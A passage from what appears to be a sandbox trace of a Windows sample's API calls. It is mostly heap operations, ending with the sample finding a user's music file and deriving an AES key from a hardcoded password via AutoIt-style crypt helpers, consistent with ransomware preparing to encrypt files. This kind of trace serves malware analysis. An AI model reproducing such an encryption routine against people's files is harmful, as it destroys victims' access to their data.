Flags=0x0, Size=0x10) returned 0x43ca340 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0110.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.575] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0110.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.576] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.577] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.577] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0110.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0110.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0110.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0110.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9dd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0110.579] CloseHandle (hObject=0x298) returned 1 [0110.579] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.579] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0110.579] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f67b0, ftCreationTime.dwHighDateTime=0x1d5e9c5, ftLastAccessTime.dwLowDateTime=0xf1ec05f0, ftLastAccessTime.dwHighDateTime=0x1d5ed3e, ftLastWriteTime.dwLowDateTime=0xf1ec05f0, ftLastWriteTime.dwHighDateTime=0x1d5ed3e, nFileSizeHigh=0x0, nFileSizeLow=0x12e0b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Juj1PsS7vx.m4a", cAlternateFileName="JUJ1PS~1.M4A")) returned 0x41ac600 [0110.580] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0110.580] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0110.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0110.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0110.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0110.580] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0110.581] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0110.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.581] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0110.581] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.581] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca3d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0110.581] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0110.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.581] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0110.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca1a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0110.582] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0110.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca220, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0110.582] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0110.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0110.582] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0110.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0110.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0110.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0110.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 